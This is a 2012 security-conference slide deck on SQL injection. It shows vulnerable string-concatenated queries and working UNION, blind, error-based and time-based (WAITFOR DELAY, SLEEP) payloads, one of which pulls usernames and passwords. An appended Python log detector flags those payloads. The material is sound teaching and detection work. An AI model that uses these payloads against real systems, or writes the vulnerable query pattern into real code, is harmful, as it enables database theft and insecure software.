
Time-Based Blind SQL Injection


This presentation was given at the November 2012 chapter meeting of the Memphis ISSA. In the presentation, I discuss various methods of exploiting common SQL Injection vulnerabilities, as well as present a specialized technique known as Time-Based Blind SQL Injection. Related to the latter, I give a scenario in which other common forms of SQL Injection would fail to produce results for a penetration tester or attacker, and show how one may overcome this situation by using the specialized technique. The scenario given, along with the sample code, is NOT a contrived example, but instead is closely based on a real-world application that I encountered as part of an assessment.

A live demonstration of the common forms of SQL Injection was also given which utilized the OWASP Broken Web Apps VM, DVWA, Burp Proxy and SQL Power Injector. To demo a real-world time-based blind injection, I created and locally hosted a new application which closely mimicked the real-world application mentioned above.


Time-Based Blind SQL Injection

  1. TIME-BASED BLIND SQL INJECTION
     Matt Presson (@matt_presson), Memphis ISSA, November 2012
  2. WHO AM I?
     Sr. Information Security Analyst
     Focus:
       • Application Security
       • Database Security
       • Mobile Security
  3. OBJECTIVE
       • Quick introduction to SQL Injection
       • Four main types of SQL Injection
       • Time-based + Blind
       • A likely scenario
       • DEMOs
  4. INTRO TO SQL INJECTION
  5. DEFINITION
     "SQL injection is an attack in which malicious code is inserted into strings that are later passed to [a database] for parsing and execution."
     "The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed."
     Source: http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx
  6. SAMPLE VULNERABLE CODE
     var _shipCity = Request.form("ShipCity");
     var sql = "select * from OrdersTable" + " where ShipCity = " + "'" + _shipCity + "'";
     Source: http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx
  7. CATEGORIES OF SQL INJECTION
       • Normal: UNION queries
       • Blind: Boolean expressions
       • Error-based: Valid syntax that throws exceptions
       • Time-based: Resource intensive or sleep-style queries
  8. EXAMPLES – NORMAL INJECTION
     var sql = "select ShipCity, Dest from Orders" + " where ShipCity = '" + _shipCity + "'";
     Inject: ' UNION <data you want to extract> -- -
     Example:
     select ShipCity, Dest from Orders where ShipCity='' UNION select Username, Password from Users -- -
  9. EXAMPLES – BLIND INJECTION
     var sql = "select * from Orders" + " where ShipCity = '" + _shipCity + "'";
     Inject: <valid value> and <positive expression>
             <valid value> and <negative expression>
     Example:
     select * from Orders where ShipCity='Memphis' and 1=1
  10. EXAMPLES – ERROR-BASED INJECTION
     var sql = "select * from Orders" + " where ShipCity = '" + _shipCity + "'";
     Example (SQL Server):
     select * from Orders where ShipCity='' and 1=CAST(suser_name() as INT)-- -
     Example (MySQL):
     select * from Orders where ShipCity='' and ExtractValue(0,CONCAT(0x5c,(select user())))-- -
  11. EXAMPLES – TIME-BASED INJECTION
     var sql = "select ShipCity, Dest from Orders" + " where ShipCity = '" + _shipCity + "'";
     Example (SQL Server):
     select ShipCity, Dest from Orders where ShipCity='' waitfor delay '0:0:10'
     Example (MySQL >= 5.0.12):
     select ShipCity, Dest from Orders where ShipCity='' UNION SELECT SLEEP(5), 2
  12. TIME-BASED + BLIND
     Same: Resource intensive or sleep/wait style functions
     New:
       • Extract arbitrary data
       • Bypass business functionality
  13. EXAMPLES – TIME-BASED + BLIND
     var sql = "select ShipCity, Dest from Orders" + " where ShipCity = '" + _shipCity + "'";
     Example (SQL Server):
     select ShipCity, Dest from Orders where ShipCity=''; if(<boolean>) waitfor delay '0:0:10'
     Example (MySQL >= 5.0.12):
     select ShipCity, Dest from Orders where ShipCity='' UNION SELECT IF(<bool>,SLEEP(5),1), 2
  14. SCENARIO
  15. DEMOS
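A time-based blind injection of the kind shown in slides 11 and 13 changes nothing in the response body, so response timing is the only trace it leaves in server-side logs. The following Python example is added here (it is not from the slides) and runs two detection heuristics over constructed access-log lines: a pattern match for delay primitives in the decoded query parameters, and a per-path timing baseline that flags responses far slower than the median. The log format, the `/orders` path and the sample timings are assumptions.

```python
import re
from statistics import median
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (not from the slides): method, URL, status, response time in ms.
# Lines 2 and 3 carry the deck's SQL Server and MySQL payloads URL-encoded; line 6 is merely slow.
SAMPLE_LOG = """\
GET /orders?ShipCity=Memphis 200 41
GET /orders?ShipCity=Nashville 200 39
GET /orders?ShipCity=Memphis%27%3B+if%281%3D1%29+waitfor+delay+%270%3A0%3A10%27-- 200 10052
GET /orders?ShipCity=%27+UNION+SELECT+IF%281%3D1%2CSLEEP%285%29%2C1%29%2C+2-- 200 5047
GET /orders?ShipCity=Memphis%27+and+1%3D1 200 40
GET /orders?ShipCity=Memphis 200 38
GET /orders?ShipCity=Memphis 200 8120""".splitlines()

# Delay primitives named in the deck (WAITFOR DELAY, SLEEP) plus the other common ones.
DELAY_PATTERN = re.compile(
    r"\bwaitfor\s+delay\b|\bsleep\s*\(|\bbenchmark\s*\(|\bpg_sleep\s*\(", re.IGNORECASE)
LOG_RE = re.compile(r"^(?P<method>\S+) (?P<url>\S+) (?P<status>\d{3}) (?P<ms>\d+)$")

def parse_line(line):
    """Split one log line into path, decoded query parameters and response time, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    params = dict(parse_qsl(parts.query, keep_blank_values=True))  # parse_qsl URL-decodes
    return {"path": parts.path, "params": params, "ms": int(m.group("ms"))}

def find_time_based_injection(lines, slow_ms=3000):
    """Return (line_index, reasons) for suspicious requests: a delay primitive in a
    decoded parameter, or a response at least slow_ms above the path's median
    (the only signal left when the payload itself is not visible in the log)."""
    records = [(i, r) for i, r in ((i, parse_line(l)) for i, l in enumerate(lines)) if r]
    by_path = {}
    for _, r in records:
        by_path.setdefault(r["path"], []).append(r["ms"])
    baseline = {path: median(times) for path, times in by_path.items()}
    hits = []
    for i, r in records:
        reasons = [f"delay primitive in parameter {k!r}"
                   for k, v in r["params"].items() if DELAY_PATTERN.search(v)]
        excess = r["ms"] - baseline[r["path"]]
        if excess >= slow_ms:
            reasons.append(f"response {excess:.0f} ms above the median for {r['path']}")
        if reasons:
            hits.append((i, reasons))
    return hits
```

Calling `find_time_based_injection(SAMPLE_LOG)` flags lines 2 and 3 on both signals and line 6 on timing alone; the timing signal by itself is a prompt to inspect the request, not proof of injection.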
